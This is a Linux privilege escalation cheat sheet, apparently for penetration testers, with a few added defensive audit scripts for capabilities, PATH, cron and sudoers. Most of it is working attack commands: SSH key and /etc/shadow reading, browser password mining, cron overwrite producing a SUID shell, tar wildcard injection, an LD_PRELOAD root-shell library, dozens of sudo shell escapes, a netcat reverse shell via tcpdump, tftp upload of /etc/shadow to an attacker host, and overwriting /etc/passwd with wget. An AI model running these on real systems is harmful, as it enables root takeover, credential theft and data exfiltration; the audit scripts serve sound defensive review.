Linux Privilege Escalation Checklist
User Home Directory Enumeration
By User RSA Key
$ cat .ssh/id_rsa
$ vim id_rsa_bee
$ chmod 600 id_rsa_bee
$ ssh -i id_rsa_bee root@192.168.1.61
By User History
$ cat .mysql_history
$ cat .bash_history
Some Software Examples for Privilege Escalation
Mozilla Firefox User Data Folder
Look for data in the firefox default folder.
$ cd ~/.mozilla/firefox
FIREFOX DECRYPT is a tool for extracting passwords from profiles of Mozilla (Fire/Water)fox™, Thunderbird®, SeaMonkey® and derivatives.
DUMPZILLA (official site: http://www.dumpzilla.org/) is a "Mozilla browser forensic tool" whose purpose is to extract all forensically interesting information from Firefox, Iceweasel and SeaMonkey browsers so that it can be analysed.
Google Chrome User Data Folder
$ cd ~/.config/google-chrome/
Location of Filezilla.xml
$ cd ~/.config/filezilla
Putty — SSH Client
$ cd ~/.putty/
$ cd ~/.putty/sessions/
Thunderbird User Data Location
$ cd ~/.thunderbird/
$ cd ~/.mozilla-thunderbird/
Use FIREFOX DECRYPT or DUMPZILLA on the Thunderbird profile as well.
User Details
$ id
$ sudo -l
$ who -a
$ w
$ cat /etc/passwd
$ cat /etc/shadow
Operating System
$ hostname
$ uname
$ uname -a
> Linux kali 5.10.0-kali2-amd64 #1 SMP Debian 5.10.9-1kali1 (2021-01-22) x86_64 GNU/Linux
> Linux - kernel name (the same command on BSD or macOS gives a different result)
> kali - hostname
> 5.10.0-kali2-amd64 - kernel release
> #1 SMP Debian 5.10.9-1kali1 - kernel version (Debian SMP build)
> x86_64 - machine / processor / OS architecture
> GNU/Linux - operating system
$ uname -r   (kernel release)
$ uname -mrs
$ uname -a | awk '{print $3}' | cut -d '-' -f 1   (kernel release, version number only)
$ cat /proc/version
$ cat /etc/issue
$ cat /etc/*-release
$ cat /etc/lsb-release
$ cat /etc/redhat-release
$ rpm -q kernel
$ rpm -qa | grep kernel
$ dpkg -l | grep kernel
$ dmesg | grep Linux
$ ls /boot | grep vmlinuz-
$ ls /etc/ | grep release
$ lscpu   (CPU details)
Kernel Exploit
$ searchsploit "Linux Kernel"
$ curl https://raw.githubusercontent.com/lucyoa/kernel-exploits/master/README.md 2>/dev/null | grep "Kernels: " | cut -d ":" -f 2 | cut -d "<" -f 1 | tr -d "," | tr ' ' '\n' | grep -v "^[0-9]\.[0-9]$" | sort -u -r | tr '\n' ' '
CVE-2016-5195 (DirtyCow)
searchsploit result: Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method) | linux/local/40839.c
https://github.com/FireFart/dirtycow/blob/master/dirty.c
https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs
https://dirtycow.ninja/
Application and Service Details
What applications are installed? What versions are they? Are they currently running?
$ ls -alh /usr/bin
$ ls -alh /bin
$ ls -alh /usr/sbin
$ ls -alh /sbin
$ ls -alh /usr/local/bin
$ ls -alh /usr/local/sbin
$ dpkg -l
$ rpm -qa
$ ls -lha /var/cache/apt/archives/
$ ls -lha /var/cache/yum/*
$ ls -lha /var/cache/yum/x86_64/7/*
$ rpm -qa | grep ftp
$ rpm -qi ftp-0.17-67.el7.x86_64
$ ps -aux
$ ps -aux | grep root
$ ps -aux | grep -v root
$ pstree
$ ps -ef
$ ps -ef | grep root
$ ps -ef | grep -v root
Check Running Services (System V init and systemd)
$ service --status-all
$ service --status-all | less
$ service apache2 status
$ systemctl status apache2.service
$ systemctl
$ systemctl list-units --type=service
$ systemctl --type=service
$ systemctl list-units --type=service --state=running
$ systemctl --type=service --state=running
$ systemctl | grep running
$ running_services
$ chkconfig --list
$ chkconfig --list | grep 3:on
$ chkconfig httpd on
$ chkconfig httpd off
$ initctl list
SUID Escalation
> Shared Object Injection
> Binary Symlinks
> Systemctl — SUID Binary
$ locate .service
Capabilities
Binaries that commonly carry file capabilities:
> /usr/bin/ping
> /usr/bin/dumpcap
> /usr/bin/gnome-keyring-daemon
> /usr/bin/rlogin
> /usr/bin/fping
> /usr/bin/rsh
> /usr/bin/rcp
Listing capabilities:
$ getcap -r /usr/bin/
$ getcap /usr/bin/ping
$ getcap -r /usr/sbin
$ /usr/sbin/getcap -r / 2>/dev/null
Setting capabilities (examples):
$ setcap cap_net_raw+p /usr/bin/rcp
$ setcap cap_net_bind_service+ep /usr/bin/ping
$ setcap cap_setuid+ep /usr/bin/php7.3
$ setcap cap_setuid+ep /usr/bin/python2.7
$ setcap cap_setuid+ep /usr/bin/gdb
See https://guif.re and GTFOBins.
Interpreters with cap_setuid:
$ /usr/bin/getcap /usr/bin/php7.3
$ CMD="/bin/sh"
$ /usr/bin/php7.3 -r "posix_setuid(0); system('$CMD');"
$ /usr/bin/getcap /usr/bin/python2.7
$ /usr/bin/python2.7 -c 'import os; os.setuid(0); os.system("/bin/sh")'
$ /usr/bin/getcap /usr/bin/gdb
$ /usr/bin/gdb -nx -ex 'python import os; os.setuid(0)' -ex '!sh' -ex quit
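An added example (not part of the original checklist): a POSIX shell function that reads `getcap -r` output and flags the capabilities which make a binary equivalent to a SUID-root program, so that a cap_setuid on php, python or gdb like the one set above is caught during review. The function name, the finding labels and the constructed sample output are assumptions of this example; both libcap output styles are handled.

```shell
#!/bin/sh
# cap_audit: read `getcap -r` output on stdin and flag file capabilities that
# let a program change uid or bypass file permission checks.
# Both libcap output styles are accepted:
#   "/usr/bin/ping = cap_net_raw+ep"    (libcap before 2.41)
#   "/usr/bin/ping cap_net_raw=ep"      (libcap 2.41 and later)
# Usage: getcap -r / 2>/dev/null | cap_audit   -> one finding per line; exit 1 if any.
cap_audit() {
    out=$(
        while read -r line; do
            [ -n "$line" ] || continue
            path=${line%%[[:space:]]*}        # first token: the file
            caps=${line##*[[:space:]]}        # last token, e.g. cap_setuid,cap_sys_ptrace=ep
            caps=${caps%%[+=]*}               # drop the "+ep" / "=ep" flag suffix
            for c in $(printf '%s' "$caps" | tr ',' ' '); do
                case "$c" in
                    cap_setuid|cap_setgid|cap_dac_override|cap_dac_read_search|cap_sys_admin|cap_sys_ptrace|cap_sys_module|cap_chown|cap_fowner)
                        echo "DANGEROUS-CAP  $path  $c ($caps)" ;;
                esac
            done
        done
    )
    if [ -n "$out" ]; then
        printf '%s\n' "$out"
        return 1
    fi
    return 0
}

# Constructed sample getcap output (not from a real host), mixing both formats.
sample_getcap() {
    cat <<'EOF'
/usr/bin/ping = cap_net_raw+ep
/usr/bin/dumpcap = cap_net_admin,cap_net_raw+eip
/usr/bin/php7.3 = cap_setuid+ep
/usr/bin/python2.7 cap_setuid=ep
/usr/bin/gdb cap_setuid,cap_sys_ptrace=ep
EOF
}

sample_getcap | cap_audit || echo "-> remove these capabilities (setcap -r) or restrict execute permission on the binaries"
```

On a real host the input would be `getcap -r / 2>/dev/null`; ping and dumpcap pass because cap_net_raw and cap_net_admin do not by themselves give a uid change, while the three interpreters are reported.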
PATH Variable (PATH Abusing)
Environment: display the current $PATH and environment information.
$ echo $PATH
$ env
> strings /usr/bin/user_hello
$ vim ~/.bashrc
Exporting PATH:
$ export PATH=/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
$ export PATH=/tmp:$PATH
Custom Binary:
Set the binary's PATH, then build shc (the shell script compiler):
$ yum install glibc-devel
$ cd /usr/src
$ wget http://www.datsi.fi.upm.es/~frosal/sources/shc-3.8.9.tgz
$ sudo tar xzf shc-3.8.9.tgz
$ cd shc-3.8.9
$ make
$ make install
$ vim user_hello.sh
Another Custom Binary:
user_hello.sh:
#!/bin/bash
echo "Hello"
whoami

$ shc -T -f user_hello.sh
$ mv user_hello.sh.x user_hello
$ ./user_hello
$ strings /usr/bin/user_hello
$ whoami
$ vim user_hello.c
Another Custom Binary to get root:
#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>
int main(void) { setresuid(0, 0, 0); system("/bin/sh"); return 0; }
OR
#include <unistd.h>
int main(void) { setgid(0); setuid(0); execl("/bin/sh", "sh", (char *)NULL); return 0; }
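An added example (not part of the original checklist): a POSIX shell function that audits a PATH string for the conditions the section above relies on, namely a world-writable directory such as /tmp placed in front of the system directories, an empty element or ".", and relative entries. The function name path_audit, its finding labels and the constructed demo PATH are assumptions of this example.

```shell
#!/bin/sh
# path_audit: report PATH elements that let a planted binary shadow a real command.
# Flags: empty elements or "." (commands resolve from the current directory),
# relative elements, and directories writable by "other" (mode o+w, e.g. /tmp).
# Usage: path_audit "$PATH"  -> one finding per line; exit status 1 if any.
path_audit() {
    p=$1
    findings=0
    # Wrapping in colons makes a leading, trailing or doubled colon visible as "::".
    case ":$p:" in
        *::*) echo "CWD-ENTRY  '' (empty element: the current directory is searched)"
              findings=$((findings + 1)) ;;
    esac
    old_ifs=$IFS
    IFS=:
    set -f                       # no globbing while splitting on ':'
    set -- $p
    set +f
    IFS=$old_ifs
    for d in "$@"; do
        case "$d" in
            "") ;;               # already reported above
            .)  echo "CWD-ENTRY  '.' (the current directory is searched)"
                findings=$((findings + 1)) ;;
            /*) # -prune stops find from descending; -perm -002 tests the o+w bit.
                if [ -d "$d" ] && [ -n "$(find "$d" -prune -perm -002 -print 2>/dev/null)" ]; then
                    echo "WRITABLE   '$d' (world-writable directory on PATH)"
                    findings=$((findings + 1))
                fi ;;
            *)  echo "RELATIVE   '$d' (resolved against the current directory)"
                findings=$((findings + 1)) ;;
        esac
    done
    [ "$findings" -eq 0 ]
}

# Demo on a constructed PATH: a world-writable scratch directory placed first,
# the shape that "export PATH=/tmp:$PATH" produces.
demo_dir=$(mktemp -d) && chmod 1777 "$demo_dir"
path_audit "$demo_dir:/usr/bin:." || echo "-> PATH needs attention"
rmdir "$demo_dir"
```

Run it as `path_audit "$PATH"` for the current shell, or feed it the PATH= line from /etc/crontab, a sudoers secure_path, or a service unit to check what privileged jobs will search.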
Last Edited Files :
$ find / -mmin -10 2>/dev/null | grep -Ev "^/proc"
Cron Jobs & Systemd Timers :
Cron Jobs :
$ vim /etc/crontab
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

Field - Allowed Values
Minute - 0 - 59
Hour - 0 - 23
Day of Month - 1 - 31
Month - 1 - 12
Day of Week - 1 - 7
Command - any command
For example:
- 10 * * * * rm -rf /tmp/* — at minute 10 of every hour
- 10 10 * * * rm -rf /tmp/* — at 10:10 every day
- * * * * * rm -rf /tmp/* — at every minute
- 5 * * * * rm -rf /tmp/* — at minute 5 of every hour
$ crontab -e
$ crontab -l
$ crontab -l -u root
$ crontab -e -u user
$ crontab -l -u user
$ cat /var/log/cron
$ crontab -r
$ ls /etc/cron.daily/
$ ls /etc/cron.hourly/
$ ls /etc/cron.monthly/
$ ls /etc/cron.weekly/
$ cd /etc/cron.d/
$ cat clamav   (the ClamAV update job)
Example entries:
MAILTO=root
2 * * * * root /usr/share/vim /etc/crontab
/usr/bin/tar -cvf /backup/armour/$(date +%F).tar /home/user/
* * * * * armour /usr/bin/tar -cvf /backup/user
https://crontab.guru/ — The quick and simple editor for cron schedule expressions by Cronitor .
$ crontab -l
$ ls -lah /var/spool/cron
$ ls -al /etc/ | grep cron
$ ls -al /etc/cron*
$ cat /etc/at.allow
$ cat /etc/at.deny
$ cat /etc/cron.allow
$ cat /etc/cron.deny
$ ls -lh /etc/ | grep cron
Bad File Permissions :
Cron job file locations:
/etc/init.d
/etc/cron*
/etc/crontab
/etc/cron.allow
/etc/cron.d
/etc/cron.deny
/etc/cron.daily
/etc/cron.hourly
/etc/cron.monthly
/etc/sudoers
/etc/cron.weekly
/etc/exports
/etc/anacrontab
/var/spool/cron
/var/spool/cron/crontabs/root
$ vim /etc/crontab
Cron (File Overwrite) :
* * * * * root /opt/my_script.sh
$ echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /opt/my_script.sh
$ /tmp/bash -p
$ id
$ echo "chmod 777 /etc/passwd" >> /opt/my_script.sh
Cron (Permissions) :
$ ls -l /etc/ | grep cron
drwxrwxrwx 2 root root 4096 Feb 15 11:43 cron.d
drwxr-xr-x 2 root root 4096 Feb 10 19:37 cron.daily
drwxr-xr-x 2 root root 4096 Feb 10 19:37 cron.hourly
drwxr-xr-x 2 root root 4096 Feb 10 19:37 cron.monthly
-rw-r--r-- 1 root root 1149 Nov  1 00:06 crontab
drwxr-xr-x 2 root root 4096 Feb 10 19:37 cron.weekly
AND
debian@debian:/etc/cron.d$ ls -lh
total 8.0K
-rw-r--r-- 1 root root 751 Feb 15 11:46 php
-rwxrwxrwx 1 root root  49 Feb 15 11:43 rootme
Cron (Wildcards) :
$ cat /opt/my_backup.sh
#!/bin/sh
cd /home/user/
tar czf /backup/user/1.tar.gz *

* * * * * root /usr/bin/tar czf /backup/user/$(date "+\%F-\%H-\%M").tar.gz /home/user/*
$ cd /home/user/
$ ls
$ echo "chmod u+s /usr/bin/find" > demo1.sh
$ echo "" > "--checkpoint-action=exec=sh demo1.sh"
$ echo "" > --checkpoint=1
$ ls -al /usr/bin/find
$ touch demo
$ /usr/bin/find . -exec /bin/sh -p \; -quit
* * * * * root /usr/bin/bash /script/*.sh
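An added example (not part of the original checklist): a POSIX shell function that audits a crontab in the system format (minute hour dom mon dow user command) for the three weaknesses the cron sections above describe: a world-writable job file or target script (file overwrite and bad permissions), a command given by relative path (resolved through cron's PATH), and a wildcard argument (the tar --checkpoint case). The function names, finding labels and the constructed demo tree are assumptions of this example.

```shell
#!/bin/sh
# other_writable PATH: true when the "other" write bit is set on PATH.
other_writable() { [ -n "$(find "$1" -prune -perm -002 -print 2>/dev/null)" ]; }

# cron_audit FILE: one finding per line; exit status 1 if anything was flagged.
cron_audit() {
    file=$1
    out=$(
        set -f                                   # keep '*' literal while splitting fields
        if other_writable "$file"; then
            echo "FILE-WRITABLE   $file"
        fi
        # Skip comments, blank lines and variable assignments (SHELL=, PATH=, MAILTO=).
        grep -Ev '^[[:space:]]*#|^[[:space:]]*$|^[[:alnum:]_]+=' "$file" |
        while read -r line; do
            set -- $line
            if [ "${1#@}" != "$1" ]; then        # @reboot, @daily, ...: one schedule field
                [ $# -ge 3 ] || continue
                shift 1
            else                                 # five schedule fields
                [ $# -ge 7 ] || continue
                shift 5
            fi
            user=$1; cmd=$2; shift 2; args=$*
            case "$cmd" in
                /*) if [ -e "$cmd" ] && other_writable "$cmd"; then
                        echo "SCRIPT-WRITABLE $cmd (user=$user)"
                    fi ;;
                *)  echo "RELATIVE-CMD    $cmd (user=$user)" ;;
            esac
            case "$args" in
                *\**) echo "WILDCARD        $cmd $args (user=$user)" ;;
            esac
        done
    )
    if [ -n "$out" ]; then
        printf '%s\n' "$out"
        return 1
    fi
    return 0
}

# Constructed demo tree (not a real host): one world-writable script, one tar job
# with a wildcard, one harmless job and one @reboot job with a relative command.
make_demo_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/opt" "$d/home/user"
    printf '#!/bin/sh\necho hi\n' > "$d/opt/my_script.sh"; chmod 777 "$d/opt/my_script.sh"
    printf '#!/bin/sh\necho ok\n' > "$d/opt/safe.sh";      chmod 755 "$d/opt/safe.sh"
    cat > "$d/crontab" <<EOF
# m h dom mon dow user  command
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
* * * * * root $d/opt/my_script.sh
* * * * * root /usr/bin/tar czf /backup/user.tar.gz $d/home/user/*
17 * * * * root $d/opt/safe.sh --quiet
@reboot root cleanup.sh
EOF
    chmod 644 "$d/crontab"
    echo "$d"
}

demo=$(make_demo_tree)
cron_audit "$demo/crontab" || echo "-> cron needs attention"
rm -rf "$demo"
```

Run it over /etc/crontab and every file in /etc/cron.d; per-user crontabs under /var/spool/cron have no user field, so they are not covered by this format.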
SUDO (Shell Escape Sequences and Abusing Intended Functionality):
Sudo:
$ visudo
root ALL=(ALL) ALL
The first ALL keyword indicates that this rule applies to all hosts.
The second ALL indicates that the user in the first column can run commands with the privileges of any user.
The third ALL means any command can be run.
$ vim /etc/sudoers
$ cat /etc/group | grep wheel
$ ssh a1@IP_Add
$ sudo -l
$ gpasswd -a a1 wheel
$ cat /etc/group | grep wheel
$ fdisk -l
$ gpasswd wheel
$ id
$ groups
$ sg - wheel
$ usermod -G sudo user
$ groups user
$ sudo EDITOR=vim visudo
m1 ALL=(armour) /usr/bin/touch, /usr/bin/mkdir, /usr/bin/cd
$ sudo --user=armour mkdir /home/user/d2
$ sudo EDITOR=vim visudo
Cmnd_Alias USER_CMND=/usr/sbin/fdisk, /usr/sbin/ifconfig, /usr/bin/nslookup, /usr/sbin/useradd, /usr/bin/usermod
m1 ALL=(root,armour) USER_CMND
$ sudo -l
$ useradd n1
$ sudo --user=user useradd n1
$ sudo --user=root useradd n1
$ sudo useradd n2
$ sudo EDITOR=vim visudo
Cmnd_Alias M2_CMND=/usr/bin/cd, /usr/bin/mkdir, /usr/bin/vim, /usr/bin/cp, /usr/bin/mv
m2 ALL=(ALL) M2_CMND
$ ssh m2@ip
$ groups
$ sudo -l
$ sudo --user=user vim /home/user/a1
$ sudo --user=m1 cp /etc/passwd /home/m1
Without a password:
$ sudo EDITOR=vim visudo
m1 ALL=(root,user) NOPASSWD:USER_CMND
$ sudo EDITOR=vim visudo
%grp ALL=(ALL) M2_CMND
Cmnd_Alias USER_CMND=/sbin/fdisk, /bin/su, /sbin/ifconfig, /usr/bin/apt, /usr/bin/dpkg, /bin/umount
Sudoers file syntax:
root ALL=(ALL:ALL) ALL
root ALL=(ALL) ALL
root ALL=(root) ALL
[user] [host]=[(user:group)] [commands]
username = root
host (terminal) = ALL
run as (user:group) = (ALL:ALL)
commands = ALL
Examples:
user ALL=(ALL:ALL) ALL
user ALL=(ALL:ALL) USER_CMND
root ALL = (ALL:ALL) ALL
user ALL = (ALL:ALL) NOPASSWD:ALL
%IT ALL = (ALL) NOPASSWD:/bin/mkdir, PASSWD:/bin/rm
%www-data ALL = (ALL:ALL) NOPASSWD:/usr/sbin/service apache2 *
bla ALL = (bla1) /usr/bin/scp
bla1 ALL = (ck-00) NOPASSWD: /bin/rbash
ck-00 ALL = NOPASSWD: /bin/dd
maria ALL = (root) NOPASSWD: /usr/bin/perl, /usr/bin/python, /usr/bin/less, /usr/bin/awk, /usr/bin/man, /usr/bin/visudo
$ sudo -l
Sudo (LD_Preload) :
$ sudo -l
Matching Defaults entries for user on this host:
    env_keep+=LD_PRELOAD
$ vim /tmp/env.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
$ gcc -fPIC -shared -o /tmp/env.so /tmp/env.c -nostartfiles
$ sudo LD_PRELOAD=/tmp/env.so apache2
OR
$ sudo LD_PRELOAD=/tmp/env.so httpd
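An added example (not part of the original checklist) that serves both sudo sections above: a POSIX shell function that scans a sudoers file, or a drop-in under /etc/sudoers.d, for a Defaults line that keeps LD_PRELOAD across sudo, for NOPASSWD rules, and for non-root users or groups allowed to run ALL commands. The function names, finding labels and the constructed sample sudoers are assumptions of this example; `#include` directives and the `#uid` syntax are treated as comments by the simple parser.

```shell
#!/bin/sh
# sudoers_audit FILE: one finding per line; exit status 1 if anything was flagged.
#   ENV-KEEP-LD   Defaults line keeping LD_PRELOAD or LD_LIBRARY_PATH
#   NOPASSWD      rule that needs no authentication for its commands
#   ALL-CMDS      non-root user/group allowed any command (a bare ALL in the command list)
sudoers_audit() {
    out=$(
        set -f
        sed -e 's/#.*//' "$1" |                        # strip comments
        sed -e :a -e '/\\$/N; s/\\\n//; ta' |          # join backslash continuations
        grep -v '^[[:space:]]*$' |
        while read -r line; do
            case "$line" in
                Defaults*env_keep*LD_PRELOAD*|Defaults*env_keep*LD_LIBRARY_PATH*)
                    echo "ENV-KEEP-LD   $line" ;;
                Defaults*|*_Alias*) ;;                  # other Defaults and alias definitions
                *)
                    case "$line" in
                        *NOPASSWD*) echo "NOPASSWD      $line" ;;
                    esac
                    who=${line%%[[:space:]]*}           # user, %group or User_Alias name
                    cmds=${line#*=}                     # "(runas) TAG: cmd1, cmd2"
                    cmds=${cmds#*\)}                    # drop "(runas)" when present
                    # Remove NOPASSWD:/PASSWD: tags and whitespace, then look for a bare ALL.
                    cmds=$(printf '%s' "$cmds" | sed 's/[A-Z]*PASSWD[[:space:]]*://g; s/[[:space:]]//g')
                    case "$who:,$cmds," in
                        root:*) ;;                      # root's own rule is expected
                        *,ALL,*) echo "ALL-CMDS      $line" ;;
                    esac ;;
            esac
        done
    )
    if [ -n "$out" ]; then
        printf '%s\n' "$out"
        return 1
    fi
    return 0
}

# Constructed sample sudoers (not from a real host), using the syntax shown above.
make_demo_sudoers() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
# constructed sample, not a real host's sudoers
Defaults env_reset
Defaults env_keep += "LD_PRELOAD"
root ALL=(ALL:ALL) ALL
Cmnd_Alias USER_CMND = /usr/sbin/fdisk, /usr/sbin/ifconfig
m1 ALL=(root,user) NOPASSWD:USER_CMND
%www-data ALL = (ALL:ALL) NOPASSWD:/usr/sbin/service apache2 *
user ALL = (ALL:ALL) \
    ALL
EOF
    echo "$f"
}

f=$(make_demo_sudoers)
sudoers_audit "$f" || echo "-> review these rules; keep env_reset and drop LD_PRELOAD from env_keep"
rm -f "$f"
```

The continuation line for `user` is joined before parsing, so the ALL rule is still caught; on a real system run it as `sudoers_audit /etc/sudoers` and once per file in /etc/sudoers.d.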
Spawn Root Access :
$ sudo -l   (list the sudo rights the current user can execute)
$ sudo -i
$ sudo -s
su:
$ sudo su -
$ sudo su
bash:
$ sudo /bin/bash
$ sudo bash -
$ sudo /bin/bash -l
sh:
$ sudo /bin/sh
$ sudo sh -l
$ sudo /bin/sh -l
ash:
$ sudo /bin/ash
$ sudo ash -
$ sudo /bin/ash -l
csh:
$ sudo /bin/csh
$ sudo csh -l
$ sudo /bin/csh -l
zsh:
$ sudo /bin/zsh
$ sudo zsh -l
$ sudo /bin/zsh -l
awk (spawn a shell using an AWK one-liner):
$ sudo awk 'BEGIN {system("/bin/bash")}'
$ sudo awk 'BEGIN {system("/bin/sh")}'
$ sudo awk 'BEGIN {system("bash")}'
tcpdump:
$ COMMAND='id'
$ TF=$(mktemp)
$ echo "$COMMAND" > $TF
$ chmod +x $TF
$ sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF -Z root
$ echo 'id\n/bin/netcat $ip 443 -e /bin/bash' > /tmp/test
$ chmod +x /tmp/test
$ sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/test -Z root
$ cd /tmp
$ echo "nc -e /bin/bash $IP 4455" > shell
$ chmod 777 shell
$ sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/shell -Z root
find:
$ sudo find /home -exec /bin/bash \;
$ sudo find /home -exec bash \;
$ sudo find /home -exec /bin/sh \;
$ sudo find /home -exec sh \;
perl:
$ sudo perl -e 'exec "/bin/sh";'
$ sudo perl -e 'exec "/bin/bash";'
$ sudo /usr/bin/perl -e 'exec "/bin/sh";'
$ sudo /usr/bin/perl -e 'exec "/bin/bash";'
ftp:
$ sudo ftp
ftp> !/bin/sh
$ sudo /usr/bin/ftp
ftp> !/bin/bash
python:
$ sudo python -c 'import pty; pty.spawn("/bin/sh")'
$ sudo python3 -c 'import pty; pty.spawn("/bin/sh")'
$ ./python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
rootme.py:
#!/usr/bin/env python
import pty
pty.spawn("/bin/bash")
rootme1.py:
#!/usr/bin/env python
import os
os.system("/bin/bash")
rootme2.py:
#!/usr/bin/env python
import os
os.execl("/bin/sh", "sh", "-p")
rootme3.py:
#!/usr/bin/env python
import os
os.setuid(0)
os.system("/bin/sh")
python script:
$ sudo /bin/script/shell.py
#!/usr/bin/python
import os
os.system("/bin/bash")
os.system('cp /bin/sh /tmp/sh')
os.system('chmod u+s /tmp/sh')
less:
$ sudo less /etc/profile
!/bin/sh
$ sudo less /etc/hosts
!/bin/sh
$ sudo /usr/bin/less /etc/passwd
!/bin/sh
Same with more (e.g. /var/log/messages).
shell script:
$ sudo /bin/script/shell.sh
#!/bin/bash
/bin/bash
$ mv script.sh script.sh.bak
$ echo "/bin/bash" > script.sh
$ chmod 777 getlogs.sh
$ sudo script.sh
man:
$ sudo /usr/bin/man /etc/passwd
!/bin/bash
$ sudo man man
!/bin/sh
capsh:
$ sudo capsh /bin/bash --
tftp (send sensitive files to a server):
$ sudo -E tftp AttackerIP
tftp> put /etc/shadow
time:
$ sudo /usr/bin/time /bin/sh
$ sudo time /bin/bash
timeout:
$ sudo timeout --foreground 7d /bin/sh
ul:
$ LFILE=file_to_read
$ sudo ul "$LFILE"
unexpand:
$ LFILE=file_to_read
$ sudo unexpand -t99999999 "$LFILE"
unshare:
$ sudo unshare /bin/sh
watch:
$ sudo watch -x sh -c 'reset; exec sh 1>&0 2>&0'
wget:
Attacker machine: create a passwd file with a root user entry and start a web server.
Vulnerable machine:
$ URL=http://attacker.com/file_to_get
$ LFILE=file_to_save
$ sudo wget $URL -O $LFILE
$ sudo wget AttackerIP/PORT/passwd -O /etc/passwd
xargs:
$ sudo xargs -a /dev/null sh
xxd (file read):
$ sudo xxd /etc/shadow | xxd -r
nmap:
Method 1:
$ TF=$(mktemp)
$ echo 'os.execute("/bin/sh")' > $TF
$ nmap --script=$TF
Method 2:
$ nmap --interactive
nmap> !sh
setcap (using setcap we can give the setuid capability to any language interpreter):
python:
$ cp $(which python) .
$ sudo setcap cap_setuid+ep python
$ ./python -c 'import os; os.setuid(0); os.system("/bin/sh")'
php:
$ cp $(which php) .
$ sudo setcap cap_setuid+ep php
$ CMD="/bin/sh"
$ ./php -r "posix_setuid(0); system('$CMD');"
perl:
$ cp $(which perl) .
$ sudo setcap cap_setuid+ep perl
$ ./perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
ruby:
$ cp $(which ruby) .
$ sudo setcap cap_setuid+ep ruby
$ ./ruby -e 'Process::Sys.setuid(0); exec "/bin/sh"'
https://gtfobins.github.io/ — Use this for SUID and sudo privileges.
Password Mining :
Several programs save passwords in their own directories on the PC, where they can be found and cracked. Some of these programs are:
> Brave • Chromium • Dissenter-Browser • Google Chrome • IceCat • Firefox • Opera • Slimjet • Vivaldi • Waterfox • Pidgin • Psi • DBVisualizer • Squirrel • SQLdeveloper • Clawsmail • Thunderbird • System Password • Apache Directory Studio • AWS • Docker • Environment Variable • Filezilla • gFTP • History Files • Shares • SSH Private Keys • Keepass Configuration Files • Dashlane • Grub • Network Manager • WPA Supplicant • GNOME Keyring • Kwallet • Hashdump • .htaccess — htpasswd /etc/apache2/htpass 1600 | Apache $apr1$ MD5, md5apr1, MD5(APR)
The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext, APIs, custom algorithms, databases, etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.
https://github.com/AlessandroZ/LaZagne
History :
$ cat ~/.bash_history
$ cat ~/.mysql_history
$ cat ~/.nano_history
$ cat ~/.atftp_history
$ cat ~/.viminfo
$ cat ~/.php_history
Configuration Files :
Some of the common configuration files are :
> .htaccess htpasswd /etc/apache2/htpass 1600 | Apache $apr1$ MD5, md5apr1, MD5(APR)
• config.inc.php
• wp-config.php
• db-config.php
• dbconnect.php
• cat /var/mail/armour
• cat /var/mail/root
• cat /var/spool/mail/armour
• cat /var/spool/mail/root
Commands to find configuration files are :
$ find / -type f -name httpd.conf 2>/dev/null
$ find / -type f -name access_log 2>/dev/null
$ find / -type f -name "*.log" 2>/dev/null
$ find / -type f -name error_log 2>/dev/null
$ find / -type f -name config.inc.php 2>/dev/null
$ find / -type f -name .htpasswd 2>/dev/null
$ find / -type f -name .bash_history 2>/dev/null
$ find / -type f -name .mysql_history 2>/dev/null
$ find / -type f -name service.pwd 2>/dev/null
$ find / -type f -name "config*" 2>/dev/null
Listing File Permissions :
These are common commands to find files and directories on the system which can help you with privilege escalation :
$ sudo -l
$ find / -perm 777
$ find / -perm 777 2>/dev/null
$ find / -perm 777 -type f 2>/dev/null   (files with rwx for everyone)
$ find / -perm 777 -type d 2>/dev/null
$ find / -perm 1777 -type d 2>/dev/null   (directories with rwx for everyone plus the sticky bit (t))
$ find / -perm -o=w -type f 2>/dev/null
$ find / -perm -o=wrx -type f 2>/dev/null
$ find / -perm -o=wr -type f 2>/dev/null
$ find / -perm -o=w -type d 2>/dev/null
$ find / -perm -o=wrx -type d 2>/dev/null
$ find / -perm -o=wr -type d 2>/dev/null
$ find / -writable -type d 2>/dev/null
$ find / -writable -type f 2>/dev/null
$ find / -readable -type d 2>/dev/null
$ find / -readable -type f 2>/dev/null
$ find / -type f -name httpd.conf 2>/dev/null
Writeable Location for all :
These are the location in which you have read and write permissions irrespective of the user/shell you have :
/tmp
/var/tmp
/dev/shm
SUID & SGID Files & Directories :
These commands find SUID and SGID files and directories on the system, which are useful for privilege escalation:
